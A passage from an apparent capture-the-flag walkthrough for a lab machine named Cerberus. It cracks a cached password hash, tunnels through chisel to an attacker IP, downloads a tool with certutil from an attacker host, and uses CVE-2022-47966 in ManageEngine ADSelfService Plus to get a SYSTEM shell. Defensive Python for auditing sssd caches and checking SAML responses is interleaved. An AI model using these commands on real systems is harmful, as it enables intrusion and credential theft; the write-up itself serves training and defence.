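SHA512CRYPT_RE = re.compile(rb"\$6\$[./A-Za-z0-9]{1,16}\$[./A-Za-z0-9]{86}")


def parse_ls(text):
    """Entries of an `ls -ls` listing as dicts with mode, owner, group and name."""
    return [m.groupdict() for m in map(LS_RE.match, text.splitlines()) if m]


def exposed_files(ls_text):
    """Names readable by group or others; sssd's databases should be owner-only."""
    return [e["name"] for e in parse_ls(ls_text) if e["mode"][4] == "r" or e["mode"][7] == "r"]


def find_cached_hashes(blob):
    """sha512crypt strings embedded anywhere in the database bytes."""
    return [h.decode() for h in SHA512CRYPT_RE.findall(blob)]


def audit_sssd_cache(ls_text, contents):
    """contents maps file name -> bytes; returns (severity, message) findings."""
    findings = []
    exposed = set(exposed_files(ls_text))
    for name, blob in contents.items():
        hashes = find_cached_hashes(blob)
        if hashes and name in exposed:
            findings.append(("high", f"{name} is readable by non-root and holds {len(hashes)} cached password hash(es)"))
        elif hashes:
            findings.append(("medium", f"{name} holds {len(hashes)} cached password hash(es); cache_credentials is on"))
    for name in sorted(exposed - set(contents)):
        findings.append(("low", f"{name} is readable by non-root"))
    return findings


if __name__ == "__main__":
    for sev, msg in audit_sssd_cache(SAMPLE_LS, {"cache_cerberus.local.ldb": SAMPLE_CACHE}):
        print(f"[{sev}] {msg}")
```

On a live host pass `open(path, "rb").read()` for each .ldb file; the fix is to tighten the directory and files to root-only and to question whether cache_credentials is needed on a box that is always on the domain network.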
- Cracking it with john gives 147258369, which is the password for user matthew
> john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
147258369 (?)
1g 0:00:00:02 DONE 2/3 (2023-03-20 06:18) 0.4587g/s 1056p/s 1056c/s 1056C/s ilovegod..karla
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# kali
> chisel server -p 9999 --reverse
# target
> chisel client --max-retry-count=1 <attacker-ip>:9999 R:1080:socks
- Use evil-winrm to log in as matthew
> proxychains evil-winrm -i 172.16.22.1 -u 'matthew' -p 147258369
*Evil-WinRM* PS C:\Users\matthew\desktop> cat user.txt
17b793639b70ba42f7f3d9d1f51c84f7
PE: matthew -> system, CVE-2022-47966
- Enumerate the target; you will eventually see the folder C:\Program Files (x86)\ManageEngine\ADSelfService Plus\
- Enumerate that directory; you will find it is running ADSelfService Plus 6.2, which has an unauthenticated RCE vulnerability: CVE-2022-47966
- To exploit this we need several things: the guid, the issuer_url, and the SAML endpoint ports forwarded
- The local port listing does not show the SAML endpoint port (i.e. 9251) or any web application port (i.e. 80, 443), but in fact both 443 and 9251 are open on localhost with TLS/SSL
[+] Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : CERBERUS
TCP 127.0.0.1 31000 127.0.0.1 32000 Established 5212 java
TCP 127.0.0.1 32000 0.0.0.0 0 Listening 1952 wrapper
TCP 127.0.0.1 32000 127.0.0.1 31000 Established 1952 wrapper
TCP 127.0.0.1 33308 0.0.0.0 0 Listening 6460 postgres
TCP 127.0.0.1 33308 127.0.0.1 52845 Established 6460 postgres
TCP 127.0.0.1 49899 0.0.0.0 0 Listening 5212 java
TCP 127.0.0.1 51181 127.0.0.1 51182 Established 5212 java
TCP 127.0.0.1 51182 127.0.0.1 51181 Established 5212 java
TCP 127.0.0.1 51183 127.0.0.1 51184 Established 5212 java
TCP 127.0.0.1 51184 127.0.0.1 51183 Established 5212 java
TCP 127.0.0.1 51186 127.0.0.1 51187 Established 5212 java
TCP 127.0.0.1 51187 127.0.0.1 51186 Established 5212 java
TCP 127.0.0.1 51188 127.0.0.1 51189 Established 5212 java
TCP 127.0.0.1 51189 127.0.0.1 51188 Established 5212 java
TCP 127.0.0.1 51190 127.0.0.1 51191 Established 5212 java
TCP 127.0.0.1 51191 127.0.0.1 51190 Established 5212 java
TCP 127.0.0.1 51192 127.0.0.1 51193 Established 5212 java
TCP 127.0.0.1 51193 127.0.0.1 51192 Established 5212 java
TCP 127.0.0.1 52845 127.0.0.1 33308 Established 5212 java
- You can find the guid in the access logs
*Evil-WinRM* PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\logs> cat access_log_2.txt
# read through the log and find the following
https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
- We need to forward two ports to local, 443 and 9251
# upload chisel to the target
> certutil.exe -urlcache -f http://<attacker-ip>/chisel.exe chisel.exe
> .\chisel.exe client --max-retry-count=1 <attacker-ip>:9999 R:443:localhost:443 R:9251:localhost:9251
- To find the issuer url: have Burp running, browse to https://dc.cerberus.local:9251/adminLogin.cc to log in and click on the ADFS icon. You should be able to see the following SAML requests
GET https://dc.cerberus.local/adfs/ls/?SAMLRequest=...&RelayState=...
POST https://dc.cerberus.local/adfs/ls/?SAMLRequest=...&RelayState=...&client-request-id=8f43453e-3c48-4613-9306-0080000000ed
GET https://dc.cerberus.local/adfs/ls/?SAMLRequest=...&RelayState=...&client-request-id=8f43453e-3c48-4613-9306-0080000000ed
POST https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
- In the second request, the server sets a cookie with base64-encoded values; decode the cookie and you should find the issuer url
Set-Cookie: MSISAuth=...
# after decoding, this is the SAMLResponse to your authentication request; the issuer url can be found inside
<Issuer xmlns="urn:oasis:names:tc:SAML:2.0:assertion">http://dc.cerberus.local/adfs/services/trust</Issuer>
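The Issuer and Destination values recovered above are precisely what a service provider has to pin before it trusts a SAML response, and the exploit class CVE-2022-47966 belongs to (an outdated XML-signature library processing attacker-controlled signature elements) is why the Transform algorithms inside the signature deserve an allow-list too. As an added example (not code from the writeup or from ManageEngine), the Python below decodes a base64 SAMLResponse, extracts Issuer and Destination, checks that the assertion carries a Signature, and rejects any Transform algorithm outside the standard enveloped-signature and canonicalization set. The sample responses are constructed here (the SignatureValue is a dummy); the issuer URL and samlLogin GUID are the ones found above.

```python
import base64
import xml.etree.ElementTree as ET

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}
ENVELOPED = "http://www.w3.org/2000/09/xmldsig#enveloped-signature"
EXC_C14N = "http://www.w3.org/2001/10/xml-exc-c14n#"
C14N = "http://www.w3.org/TR/2001/REC-xml-c14n-20010315"
XSLT = "http://www.w3.org/TR/1999/REC-xslt-19991116"  # never legitimate inside a SAML signature
ALLOWED_TRANSFORMS = {ENVELOPED, EXC_C14N, C14N}

# Values found in the writeup above.
EXPECTED_ISSUER = "http://dc.cerberus.local/adfs/services/trust"
EXPECTED_DESTINATION = "https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f"


def build_sample_response(transforms, issuer=EXPECTED_ISSUER):
    """Constructed SAMLResponse skeleton, base64-encoded; the SignatureValue is a dummy."""
    tf = "".join(f'<ds:Transform Algorithm="{a}"/>' for a in transforms)
    xml = (
        f'<samlp:Response xmlns:samlp="{NS["samlp"]}" xmlns:saml="{NS["saml"]}" '
        f'xmlns:ds="{NS["ds"]}" ID="_r1" Version="2.0" Destination="{EXPECTED_DESTINATION}">'
        f"<saml:Issuer>{issuer}</saml:Issuer>"
        '<saml:Assertion ID="_a1" Version="2.0">'
        f"<saml:Issuer>{issuer}</saml:Issuer>"
        '<ds:Signature><ds:SignedInfo><ds:Reference URI="#_a1">'
        f"<ds:Transforms>{tf}</ds:Transforms></ds:Reference></ds:SignedInfo>"
        "<ds:SignatureValue>QUJD</ds:SignatureValue></ds:Signature>"
        "<saml:Subject><saml:NameID>matthew</saml:NameID></saml:Subject>"
        "</saml:Assertion></samlp:Response>"
    )
    return base64.b64encode(xml.encode()).decode()


def inspect_saml_response(b64_response, expected_issuer=EXPECTED_ISSUER,
                          expected_destination=EXPECTED_DESTINATION):
    """Pre-checks to run before cryptographic verification; returns a report dict."""
    root = ET.fromstring(base64.b64decode(b64_response))
    issuer_el = root.find("saml:Issuer", NS)
    issuer = (issuer_el.text or "").strip() if issuer_el is not None else None
    assertion = root.find("saml:Assertion", NS)
    signature = assertion.find("ds:Signature", NS) if assertion is not None else None
    transforms = [t.get("Algorithm") for t in root.iter(f"{{{NS['ds']}}}Transform")]
    report = {
        "issuer": issuer,
        "destination": root.get("Destination"),
        "assertion_signed": signature is not None,
        "transforms": transforms,
        "unexpected_transforms": [t for t in transforms if t not in ALLOWED_TRANSFORMS],
        "problems": [],
    }
    if issuer != expected_issuer:
        report["problems"].append("issuer mismatch")
    if report["destination"] != expected_destination:
        report["problems"].append("destination mismatch")
    if not report["assertion_signed"]:
        report["problems"].append("assertion not signed")
    if report["unexpected_transforms"]:
        report["problems"].append("non-allow-listed transform")
    report["accept"] = not report["problems"]
    return report


if __name__ == "__main__":
    print(inspect_saml_response(build_sample_response([ENVELOPED, EXC_C14N])))
    print(inspect_saml_response(build_sample_response([ENVELOPED, XSLT])))
```

These checks are gates in front of signature verification, not a replacement for it: the real verification must be done by a maintained XML-security library against the pinned IdP certificate, and production parsing of untrusted XML should go through a hardened parser rather than xml.etree.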
# set parameters like below
GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
ISSUER_URL http://dc.cerberus.local/adfs/services/trust
RHOSTS 127.0.0.1
RPORT 9251
SSL true
TARGETURI /samlLogin
# run the exploit and get a shell
meterpreter > shell
Process 3492 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.4010]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin>whoami
whoami
nt authority\system
C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D9B1-79BF
Directory of c:\Users\Administrator\Desktop
03/06/2023 12:50 PM <DIR> .
03/06/2023 12:50 PM <DIR> ..
03/20/2023 01:42 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,395,042,304 bytes free
c:\Users\Administrator\Desktop>type root.txt
type root.txt
1aeb946c7276047287158b2d8598cb73